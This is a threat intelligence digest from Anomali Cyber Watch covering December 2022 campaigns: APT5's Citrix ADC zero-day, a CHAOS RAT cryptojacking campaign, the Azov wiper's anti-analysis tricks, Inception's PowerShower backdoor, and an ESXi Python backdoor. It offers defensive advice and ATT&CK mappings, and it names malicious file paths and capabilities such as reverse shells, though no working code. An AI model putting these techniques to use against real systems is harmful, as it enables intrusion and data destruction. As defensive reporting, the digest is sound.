Anomali Cyber Watch: APT5 Exploited Citrix Zero-Days, Azov Data Wiper Features Advanced Anti-Analysis Techniques, Inception APT Targets Russia-Controlled Territories, and More
The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Backdoors, Belarus, China, Data wiping, Russia, Ukraine and Zero-days. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
APT5: Citrix ADC Threat Hunting Guidance
(published: December 13, 2022)
On December 13, 2022, the US National Security Agency published a report on the ongoing exploitation of Citrix products. Citrix confirmed that this critical remote code execution vulnerability (CVE-2022-27518, CTX474995) affects Citrix Application Delivery Controller™ (Citrix ADC) and Citrix Gateway versions: 12.1 and 13.0 before 13.0-58.32. Active exploitation of the CVE-2022-27518 zero-day was attributed to China-sponsored APT5 (Keyhole Panda, Manganese, UNC2630) and its custom Tricklancer malware.
Analyst Comment: All customers using the affected builds are urged to install the current build or upgrade to the newest version (13.1 or newer) immediately. Anomali Platform has YARA signatures for the Tricklancer malware, network defenders are encouraged to follow additional NSA hunting suggestions (LINK). Check md5 hashes for key executables of the Citrix ADC appliance. Analyze your off-device logs: look for gaps and mismatches in logs, unauthorized modification of user permissions, unauthorized modifications to the crontab, and other known signs of APT5’s activities.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application – T1190
Tags: actor:APT5, actor:UNC2630, actor:Manganese, actor:Keyhole Panda, CVE-2022-27518, CTX474995, Citrix ADC, Citrix Gateway, Zero-day, China, source-country:CN
Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT
(published: December 12, 2022)
In November 2022, a new cryptojacking campaign was detected by Trend Micro researchers. Unlike previously-recorded campaigns that aim at installing a cryptomining software, this one is utilizing a remote access trojan (RAT): a Linux-targeting version of the open-source Chaos RAT. This Go-based RAT is multi-functional and has the ability to download additional files, run a reverse shell, and take screenshots.
Analyst Comment: Implement timely patching and updating to your systems. Monitor for a sudden increase in resource utilization, track open ports, and check the usage of and changes made to DNS routing.
MITRE ATT&CK: [MITRE ATT&CK] External Remote Services – T1133 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Command and Scripting Interpreter – T1059 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] Screen Capture – T1113 | [MITRE ATT&CK] Remote Access Tools – T1219 | [MITRE ATT&CK] Exfiltration Over C2 Channel – T1041 | [MITRE ATT&CK] Resource Hijacking – T1496 | [MITRE ATT&CK] Exploit Public-Facing Application – T1190 | [MITRE ATT&CK] Account Discovery – T1087 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] System Shutdown/Reboot – T1529 | [MITRE ATT&CK] Application Layer Protocol – T1071 | [MITRE ATT&CK] Endpoint Denial of Service – T1499 | [MITRE ATT&CK] Data Manipulation – T1565
Tags: detection:CHAOS, detection:Trojan.Linux.CHAOSRAT, malware-type:RAT, Cryptomining, Cryptojacking, Cryptocurrency, XMRig, Monero, malware-type:Miner, Russia, Bulletproof hosting, Pastebin, JSON Web Token, Golang, Linux
Pulling the Curtains on Azov Ransomware: Not a Skidsware but Polymorphic Wiper
(published: December 12, 2022)
Azov data wiper (self-named Azov Ransomware) was first detected in October 2022. Checkpoint researchers detected over 17,000 malicious binaries related to Azov, as multiple binaries can be associated with one infection since the wiper is backdooring some executable files with shellcodes encoded in a polymorphic way. Despite fake ransom notes that may look unsophisticated, researchers find several advanced techniques implemented in Azov — manually crafted assembly, injecting payloads into executables in order to backdoor them, and several anti-analysis techniques. Those include junk code, opaque constants, opaque predicates, preventing usage of software breakpoints, syntactic confusion and bloat, and volatile allocation of WIN API routines.
Analyst Comment: Smokeloader infection often delivers credential stealing malware that would be an additional concern for those already suffering from unrecoverable destruction caused by Azov. As long as individuals continue to download cracked software, threat actors will continue using it as a distribution method. These types of downloads should be restricted by your company. Provide your employees with legitimate software that is not backdoored and is maintained and receives security patches. Researchers should be aware of false-flag operations such as Azov that had Ukrainian and Polish references planted in its original fake ransom note.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction – T1485 | [MITRE ATT&CK] Ingress Tool Transfer – T1105 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Virtualization/Sandbox Evasion – T1497
Tags: detection:Azov, malware-type:Wiper, Volatile Homebrew IAT, Call-return abuse, Opaque predicates, Opaque constants, Syntactic confusion, Ukraine, Pirated software, detection:Smokeloader, malware-type:Loader, False flag, Windows
Cloud Atlas Targets Entities in Russia and Belarus Amid the Ongoing War in Ukraine
(published: December 9, 2022)
The Inception (Cloud Atlas) cyberespionage group has been active in its current form since at least 2014, and likely was preceded by the RedOctober activity in 2007-2013. In December 2022, Check Point and Positive Technologies researchers independently profiled a new Inception campaign targeting Russia, Belarus, and Russia-occupied areas in Ukraine and Moldova. The group has continued using spearphishing to deliver its custom PowerShell-based backdoor called PowerShower. PowerShower delivers the newly-documented RtcpProxy tool: a Windows DLL that enables relaying for The Inception’s world-wide proxy network.
Analyst Comment: With the escalation of the military actions between Russia and Ukraine, all involved sides remain heavily targeted by various cyberespionage groups. Spearphishing remains the preferable intrusion technique for Inception and a number of other involved cyberespionage groups.
MITRE ATT&CK: [MITRE ATT&CK] Proxy – T1090 | [MITRE ATT&CK] Phishing – T1566 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Inter-Process Communication – T1559 | [MITRE ATT&CK] Command and Scripting Interpreter – T1059 | [MITRE ATT&CK] Exploitation for Client Execution – T1203 | [MITRE ATT&CK] Boot or Logon Autostart Execution – T1547 | [MITRE ATT&CK] Template Injection – T1221 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Data from Removable Media – T1025 | [MITRE ATT&CK] Data from Network Shared Drive – T1039 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Archive Collected Data – T1560 | [MITRE ATT&CK] Automated Collection – T1119 | [MITRE ATT&CK] Encrypted Channel – T1573 | [MITRE ATT&CK] Exfiltration Over C2 Channel – T1041 | [MITRE ATT&CK] Web Service – T1102
Tags: mitre-group:Inception, actor:Cloud Atlas, detection:PowerShower, PowerShell, Spearphishing, Russia, target-country:RU, Belarus, target-country:BY, target-region:Transnistria, target-region:Crimea, target-region:Luhansk, target-region:Donetsk, target-industry:Government, target-industry:Diplomatic, target-industry:Energy, target-industry:Technology, malware-type:Proxy, detection:RtcpProxy, file-type:DLL, VBS, file-type:HTA, file-type:LNK, OpenDrive, Windows
A Custom Python Backdoor for VMWare ESXi Servers
(published: December 9, 2022)
Juniper researchers detected a new Python backdoor that appears to be made for tailored targeting of VMware ESXi servers. The attack probably (medium confidence) starts with the exploitation of a vulnerability in the ESXi’s OpenSLP service (CVE-2019-5544 and CVE-2020-3992). The Python-based backdoor file is saved to the persistent disk stores, three ESXi system files are modified in the RAM (they are being restored or reapplied after a reboot). The malware is launching a reverse shell and a reverse proxy, and allows password-protected remote access.
Analyst Comment: Network defenders should check their ESXi instances. local.sh should not have unauthorized commands added. /store/packages/vmtools.py is likely a malicious addition that is masquerading with its name and a VMware-mimicking copyright statement in the code. Keep your VMWare systems up-to-date on security patches and updates.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application – T1190 | [MITRE ATT&CK] Command and Scripting Interpreter – T1059 | [MITRE ATT&CK] Proxy – T1090
Tags: ESXi, Python, malware-type:Backdoor, port:8307, port:427, Reverse shell, Reverse proxy, OpenSLP, VMware, CVE-2019-5544, CVE-2020-3992, file-type:PY, file-type:SH